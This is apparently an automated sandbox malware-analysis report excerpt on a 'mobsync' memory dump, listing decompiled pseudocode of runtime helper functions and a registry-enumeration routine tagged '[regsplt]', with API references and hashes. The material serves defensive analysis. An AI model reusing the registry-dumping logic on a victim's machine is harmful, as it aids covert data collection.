CreateFileW.KERNEL32(00412B11,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,00000000,?,004173C9,00000000,00000000,00000000), ref: 004172FA
CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,004173C9,00000000,00000000,00000000), ref: 00417306
WriteFile.KERNEL32(00000000,00000000,00000000,00412B11,00000000,?,00000000,00000000,?,004173C9,00000000,00000000,00000000), ref: 00417318
CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,004173C9,00000000,00000000,00000000), ref: 00417325

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668

Uniqueness

Uniqueness Score: -1.00%

Function 0044618A, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044618A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00446153(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0043E61D(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						L0043EE85(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00446199
0x0044619f
0x004461f7
0x004461f7
0x004461a1
0x004461a2
0x004461a7
0x004461b0
0x004461b6
0x004461bc
0x004461c1
0x00000000
0x004461c3
0x004461c9
0x004461ce
0x004461ec
0x004461e6
0x004461e6
0x004461e8
0x004461e8
0x004461ef
0x004461f4
0x004461c1
0x004461fb
0x004461fe
0x004461fe
0x0044620c

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00446193
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6

Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,?,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
_free.LIBCMT ref: 004461EF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: 0d47feac254ed17272d5ccd6b259e44652446bcafeae522851d9a4f2b3879d04
Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
Opcode Fuzzy Hash: 0d47feac254ed17272d5ccd6b259e44652446bcafeae522851d9a4f2b3879d04
Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA

Uniqueness

Uniqueness Score: -1.00%

Function 004409F6, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004409F6(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46a1e0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = L0043DFD9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = L00440F8E(_t13, _t16, __eflags,  *0x46a1e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t13, _t15, 0x46b654);
							L0043EE85(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						L0043EE85();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = L00440F38(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x004409f6
0x00440a01
0x00440a03
0x00440a05
0x00440a0a
0x00440a0d
0x00440a1b
0x00440a27
0x00440a2a
0x00440a2d
0x00440a3f
0x00440a44
0x00440a46
0x00440a51
0x00440a57
0x00440a5f
0x00440a61
0x00000000
0x00000000
0x00000000
0x00000000
0x00440a48
0x00440a48
0x00000000
0x00440a48
0x00440a2f
0x00440a2f
0x00440a30
0x00440a30
0x00440a63
0x00440a64
0x00440a64
0x00440a0f
0x00440a15
0x00440a19
0x00440a6c
0x00440a6d
0x00440a73
0x00000000
0x00000000
0x00000000
0x00440a19
0x00440a7a

APIs

GetLastError.KERNEL32(?,00000000,00000000,00436208,00000000,?,?,0043628C,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004409FB
_free.LIBCMT ref: 00440A30
_free.LIBCMT ref: 00440A57
SetLastError.KERNEL32(00000000), ref: 00440A64
SetLastError.KERNEL32(00000000), ref: 00440A6D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
Instruction ID: 1381cb6b9671630b60042f8ed21df7efebf9c3361f552f6813510b12c123861f
Opcode Fuzzy Hash: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
Instruction Fuzzy Hash: 4D014936141B0077F211A7726C8592B1628ABE17B6B24003BF606B22C2EE7CCD27812F

Uniqueness

Uniqueness Score: -1.00%

Function 004477EC, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004477EC(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46a188; // 0x46a180
					if(_t23 != 0) {
						L0043EE85(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46a18c; // 0x46b64c
					if(_t24 != 0) {
						L0043EE85(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46a190; // 0x46b64c
					if(_t25 != 0) {
						L0043EE85(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46a1b8; // 0x46a184
					if(_t26 != 0) {
						L0043EE85(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46a1bc; // 0x46b650
					if(_t27 != 0) {
						return L0043EE85(_t6);
					}
				}
				return _t6;
			}

0x004477f2
0x004477f7
0x004477fb
0x00447801
0x00447804
0x00447809
0x0044780d
0x00447813
0x00447816
0x0044781b
0x0044781f
0x00447825
0x00447828
0x0044782d
0x00447831
0x00447837
0x0044783a
0x0044783f
0x00447840
0x00447843
0x00447849
0x00000000
0x00447851
0x00447849
0x00447854

APIs

_free.LIBCMT ref: 00447804

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD

_free.LIBCMT ref: 00447816
_free.LIBCMT ref: 00447828
_free.LIBCMT ref: 0044783A
_free.LIBCMT ref: 0044784C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
Instruction ID: 4303ca86cc9478dbe0e1a161fb054b60f5dbdf3f65db9d6ac859b8e84f87df60
Opcode Fuzzy Hash: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
Instruction Fuzzy Hash: 21F0683240950067D620FB56E8C6C4773E9AB85B11B64182FF014E7641DF78FC86CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C51C, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043C51C(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46a9a0; // 0x30f9390
					if(_t7 != 0x46a780) {
						L0043EE85(_t7);
						 *0x46a9a0 = 0x46a780;
					}
				}
				L0043EE85( *0x46ba08);
				 *0x46ba08 = 0;
				L0043EE85( *0x46ba0c);
				 *0x46ba0c = 0;
				L0043EE85( *0x46ba34);
				 *0x46ba34 = 0;
				L0043EE85( *0x46ba38);
				 *0x46ba38 = 0;
				return 1;
			}

0x0043c525
0x0043c529
0x0043c52b
0x0043c537
0x0043c53a
0x0043c540
0x0043c540
0x0043c537
0x0043c54c
0x0043c559
0x0043c55f
0x0043c56a
0x0043c570
0x0043c57b
0x0043c581
0x0043c589
0x0043c592

APIs

_free.LIBCMT ref: 0043C53A

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD

_free.LIBCMT ref: 0043C54C
_free.LIBCMT ref: 0043C55F
_free.LIBCMT ref: 0043C570
_free.LIBCMT ref: 0043C581

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
Instruction ID: db1f80643b0f74365b7cf98d951e7b1d55b60743bdd7e37d059670ddde76a049
Opcode Fuzzy Hash: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
Instruction Fuzzy Hash: 90F0F471803A209BCB116F96BC824063760E748B24B11152BF410E67B1FFB94596CFDF

Uniqueness

Uniqueness Score: -1.00%

Function 0041077E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041077E(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E004505A0();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E00431810(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E004032F1(E004043E5(_t110,  &_v108,  &_v668, _t152, E0040425F(_t110,  &_v56, "\n")));
							L00401ED0();
							_t112 =  &_v56;
							L00401ED0();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0043A6FF(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E004032F1(E004043E5(_t110,  &_v56,  &_v43956, _t156, E0040425F(_t110,  &_v132, "\n")));
								L00401ED0();
								L00401ED0();
								E00403416(E004075C4(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402064(_t110,  &_v56, "\n")));
								L00401FA7();
								L00401FA7();
								_t93 = E00402064(_t110,  &_v156, "[regsplt]");
								E00403416(L00402EFD( &_v132, E0040208B(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								L00401FA7();
								L00401FA7();
								_t112 =  &_v156;
								_t73 = L00401FA7();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}

0x0041077e
0x00410786
0x0041078d
0x00410793
0x0041079d
0x0041079f
0x004107a4
0x004107a7
0x004107b1
0x004107b4
0x004107e5
0x004107eb
0x004107f0
0x004107f6
0x004107f9
0x00410814
0x0041081a
0x0041081c
0x00410841
0x00410849
0x0041084e
0x00410851
0x00410851
0x00410856
0x00410857
0x004107f6
0x0041085c
0x00410861
0x00410867
0x0041086b
0x00410871
0x00410873
0x0041087a
0x00410881
0x00410882
0x00410889
0x0041088a
0x0041088c
0x0041088f
0x004108b4
0x004108ba
0x004108bc
0x004108cb
0x004108d0
0x004108f6
0x004108fe
0x00410906
0x0041092b
0x00410933
0x0041093b
0x0041094b
0x00410974
0x0041097c
0x00410984
0x00410989
0x0041098f
0x0041098f
0x00410994
0x00410995
0x00410871
0x0041086b
0x004109a4

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 004107E5
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00410814
RegEnumValueW.ADVAPI32 ref: 004108B4

Strings

[regsplt], xrefs: 00410940

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 8beed8cdd47edd9f077598238c3273a82390ffcdb761a517f76990a10eddaf30
Instruction ID: 22bbaa2dbcebefa3ea57dad675ad9f0084f54ab00d474abf25edfd55553df339
Opcode Fuzzy Hash: 8beed8cdd47edd9f077598238c3273a82390ffcdb761a517f76990a10eddaf30
Instruction Fuzzy Hash: CB511B71900219AADB10EA95CC85EEFB77DAF04304F50017AF505F2191EB786B49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00445519, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00445519(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = L0043BBA2(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0044C479(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043629A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = L0043DFD9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0044C479(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E004458E8(_a12, __eflags, _t213);
													L0043EE85(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0044C479(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043629A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46a00c; // 0x44c884ad
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = L0044ED70(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00431810(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0044E990(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00445501);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0042F61B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							L0043EE85(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = L0044ED30( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E004458C3( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = L00439E14();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043626D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0044551e
0x00445521
0x00445527
0x0044553f
0x00445542
0x00445546
0x00445548
0x0044554a
0x0044554c
0x0044554f
0x00445552
0x00445555
0x00445557
0x004455af
0x004455af
0x004455b5
0x004455b7
0x004455c2
0x004455c6
0x004455c8
0x004455cb
0x004455cf
0x004455cf
0x004455d1
0x004455d3
0x004455d5
0x004455d7
0x004455d7
0x004455d9
0x004455dc
0x004455df
0x004455df
0x004455e1
0x004455e2
0x004455e2
0x004455ed
0x004455ef
0x004455f2
0x004455f3
0x004455f6
0x004455f6
0x004455fa
0x004455fd
0x00445600
0x00445600
0x0044560e
0x00445610
0x00445613
0x00445615
0x0044561f
0x00445622
0x00445625
0x00445627
0x0044562a
0x0044562c
0x0044567c
0x0044567f
0x0044567f
0x00445681
0x00000000
0x0044562e
0x00445630
0x00445630
0x00445632
0x00445635
0x00445635
0x0044563a
0x0044563d
0x0044563d
0x0044563f
0x00445640
0x00445640
0x00445644
0x00445647
0x00445647
0x0044564a
0x0044564d
0x0044565a
0x0044565f
0x00445662
0x00445664
0x0044569e
0x0044569f
0x004456a0
0x004456a1
0x004456a2
0x004456a3
0x004456a8
0x004456ac
0x004456ae
0x004456af
0x004456b2
0x004456b2
0x004456b5
0x004456b5
0x004456b7
0x004456b8
0x004456b8
0x004456c1
0x004456c2
0x004456c5
0x004456c8
0x004456cb
0x004456cd
0x004456d4
0x004456d6
0x004456d9
0x004456e3
0x004456e6
0x004456e7
0x004456e9
0x004456fd
0x004456fd
0x00445700
0x0044570a
0x0044570f
0x00445712
0x00445714
0x00000000
0x00445716
0x0044571a
0x00445723
0x00445729
0x00000000
0x0044572c
0x004456eb
0x004456eb
0x004456f1
0x004456f6
0x004456f9
0x004456fb
0x00445732
0x00445734
0x00445735
0x00445736
0x00445737
0x00445738
0x00445739
0x0044573e
0x00445741
0x00445742
0x00445744
0x0044574a
0x00445751
0x00445754
0x00445757
0x00445758
0x0044575b
0x0044575c
0x0044575f
0x00445760
0x00445781
0x00445781
0x00445783
0x00000000
0x00000000
0x00445768
0x0044576a
